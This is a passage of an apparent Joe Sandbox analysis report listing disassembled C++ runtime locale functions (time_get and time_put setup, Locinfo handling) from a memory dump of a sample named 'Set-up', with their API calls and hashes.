                                                                                              • Instruction Fuzzy Hash: 89F0E575926208DBD710DFA4C5127CCB7F06F50705F10841DA045A7240FB7C5B45CBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29973
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028), ref: 6BC29993
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,00000028), ref: 6BC299A2
                                                                                                • Part of subcall function 6BC25809: __EH_prolog3_catch.LIBCMT ref: 6BC25810
                                                                                                • Part of subcall function 6BC25809: _Getcvt.MSVCP100(00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?), ref: 6BC2581A
                                                                                                • Part of subcall function 6BC25809: ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014), ref: 6BC25837
                                                                                                • Part of subcall function 6BC25809: _Maklocstr.LIBCPMT ref: 6BC2583D
                                                                                                • Part of subcall function 6BC25809: ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC2584D
                                                                                                • Part of subcall function 6BC25809: _Maklocstr.LIBCPMT ref: 6BC25853
                                                                                                • Part of subcall function 6BC25809: _Getdateorder.MSVCP100 ref: 6BC2585E
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC299AE
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$free$H_prolog3$??1_Maklocstr$??0_??0exception@std@@D@std@@@std@@@std@@ExceptionGetcvtGetdateorderGetdays@_Getmonths@_H_prolog3_catchInit@?$time_get@Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowU?$char_traits@V12@V12@@V?$istreambuf_iterator@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 2979494907-0
                                                                                              • Opcode ID: 839f1bc67831a509534da6850ea77e6f8bc5b5865b30f52edf376fd4df5d2087
                                                                                              • Instruction ID: e86025a11ec0344af54274a1461274b5e69faabf5daa78d82807e89ba88a8cf7
                                                                                              • Opcode Fuzzy Hash: 839f1bc67831a509534da6850ea77e6f8bc5b5865b30f52edf376fd4df5d2087
                                                                                              • Instruction Fuzzy Hash: 1DF03034926118EFDB04DFA8D1157DCBBF5AF54745F508059E445A7340EBB84B04DBA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25942
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,?,?,00000028), ref: 6BC2596C
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25977
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC2597F
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: e9d8846d50163d8a648dcccd933ed758b7a4a77ee818b42959932e220368181d
                                                                                              • Instruction ID: dbf90802d7e7c19f18dfd6a8bafc5622e38f0acac35cd90e350b2ed5cc9a452c
                                                                                              • Opcode Fuzzy Hash: e9d8846d50163d8a648dcccd933ed758b7a4a77ee818b42959932e220368181d
                                                                                              • Instruction Fuzzy Hash: EBF0E575925208DBD714DFA4C51278CB7F06F50719F10841DE049A7240FB7C5B45CBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2985C
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC2987E
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,00000028), ref: 6BC2988D
                                                                                                • Part of subcall function 6BC25809: __EH_prolog3_catch.LIBCMT ref: 6BC25810
                                                                                                • Part of subcall function 6BC25809: _Getcvt.MSVCP100(00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?), ref: 6BC2581A
                                                                                                • Part of subcall function 6BC25809: ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014), ref: 6BC25837
                                                                                                • Part of subcall function 6BC25809: _Maklocstr.LIBCPMT ref: 6BC2583D
                                                                                                • Part of subcall function 6BC25809: ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC2584D
                                                                                                • Part of subcall function 6BC25809: _Maklocstr.LIBCPMT ref: 6BC25853
                                                                                                • Part of subcall function 6BC25809: _Getdateorder.MSVCP100 ref: 6BC2585E
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC29899
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$free$H_prolog3$??1_Maklocstr$??0_??0exception@std@@D@std@@@std@@@std@@ExceptionGetcvtGetdateorderGetdays@_Getmonths@_H_prolog3_catchInit@?$time_get@Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowU?$char_traits@V12@V12@@V?$istreambuf_iterator@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 2979494907-0
                                                                                              • Opcode ID: 347983f1a1a2be9ca9a611c0da6d59f82f417c56dea1e76998f342cea3185e07
                                                                                              • Instruction ID: b3d24c198588183bb4ffa6266e7c613bd68b75c648449f53b63e009a09411d80
                                                                                              • Opcode Fuzzy Hash: 347983f1a1a2be9ca9a611c0da6d59f82f417c56dea1e76998f342cea3185e07
                                                                                              • Instruction Fuzzy Hash: 65F0A03892A118DBD700DFA8C1117CCBAF06F54305F108059A044A7340EBBC4B04DBA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29F63
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028), ref: 6BC29F83
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,00000028), ref: 6BC29F92
                                                                                                • Part of subcall function 6BC25B5B: __EH_prolog3_catch.LIBCMT ref: 6BC25B62
                                                                                                • Part of subcall function 6BC25B5B: _Getcvt.MSVCP100(00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?), ref: 6BC25B6C
                                                                                                • Part of subcall function 6BC25B5B: ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014), ref: 6BC25B89
                                                                                                • Part of subcall function 6BC25B5B: _Maklocstr.LIBCPMT ref: 6BC25B8F
                                                                                                • Part of subcall function 6BC25B5B: ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC25B9F
                                                                                                • Part of subcall function 6BC25B5B: _Maklocstr.LIBCPMT ref: 6BC25BA5
                                                                                                • Part of subcall function 6BC25B5B: _Getdateorder.MSVCP100 ref: 6BC25BB0
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC29F9E
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$free$H_prolog3$??1_Maklocstr$??0_??0exception@std@@ExceptionGetcvtGetdateorderGetdays@_Getmonths@_H_prolog3_catchInit@?$time_get@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowU?$char_traits@_V12@V12@@V?$istreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 2040812796-0
                                                                                              • Opcode ID: 81bfa17f6cfd2a1d7b9d5f7605f27e95466cb5a3ca3799f242964942a57de5d0
                                                                                              • Instruction ID: 6c3b372fc758120990aa7724668a31a5453355a2688c1128e8d634ab327566a7
                                                                                              • Opcode Fuzzy Hash: 81bfa17f6cfd2a1d7b9d5f7605f27e95466cb5a3ca3799f242964942a57de5d0
                                                                                              • Instruction Fuzzy Hash: 89F03074926118EFDB04DFA8D1517DCBBF5AF54704F508459A445A7340EBB84B04DBA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29E4C
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC29E6E
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,00000028), ref: 6BC29E7D
                                                                                                • Part of subcall function 6BC25B5B: __EH_prolog3_catch.LIBCMT ref: 6BC25B62
                                                                                                • Part of subcall function 6BC25B5B: _Getcvt.MSVCP100(00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?), ref: 6BC25B6C
                                                                                                • Part of subcall function 6BC25B5B: ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014), ref: 6BC25B89
                                                                                                • Part of subcall function 6BC25B5B: _Maklocstr.LIBCPMT ref: 6BC25B8F
                                                                                                • Part of subcall function 6BC25B5B: ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC25B9F
                                                                                                • Part of subcall function 6BC25B5B: _Maklocstr.LIBCPMT ref: 6BC25BA5
                                                                                                • Part of subcall function 6BC25B5B: _Getdateorder.MSVCP100 ref: 6BC25BB0
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,00000028), ref: 6BC29E89
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$free$H_prolog3$??1_Maklocstr$??0_??0exception@std@@ExceptionGetcvtGetdateorderGetdays@_Getmonths@_H_prolog3_catchInit@?$time_get@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowU?$char_traits@_V12@V12@@V?$istreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 2040812796-0
                                                                                              • Opcode ID: 230ede3c6be5dfe0afa4b66684d6730263d088707d4631a81bbb25a06eeac772
                                                                                              • Instruction ID: 042fb80c169625f4381785b56fe90371dd47c140b2bd67fad689fb0942968556
                                                                                              • Opcode Fuzzy Hash: 230ede3c6be5dfe0afa4b66684d6730263d088707d4631a81bbb25a06eeac772
                                                                                              • Instruction Fuzzy Hash: ADF06578926118DBD714DFB8D5517DCBBF06F54704F508459A045B7380EBBC5B04DBA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25DD1
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(00000000,?,?,00000028), ref: 6BC25DF9
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25E04
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC25E0C
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: 21a013d773996acbbd804ce5a6878bd2fee11fd8aa030ac7a5a9bd2413806e93
                                                                                              • Instruction ID: f7bc149f6f88924e4cbb20973df830e4c6e2b4aaed99037fe36f878446e3013f
                                                                                              • Opcode Fuzzy Hash: 21a013d773996acbbd804ce5a6878bd2fee11fd8aa030ac7a5a9bd2413806e93
                                                                                              • Instruction Fuzzy Hash: 23F0A075921109EFDB10DFA4C51178CBBB1BF50719F10C41DA05567250EB7C5B05CB90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25CEC
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,?,?,00000028), ref: 6BC25D16
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25D21
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC25D29
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
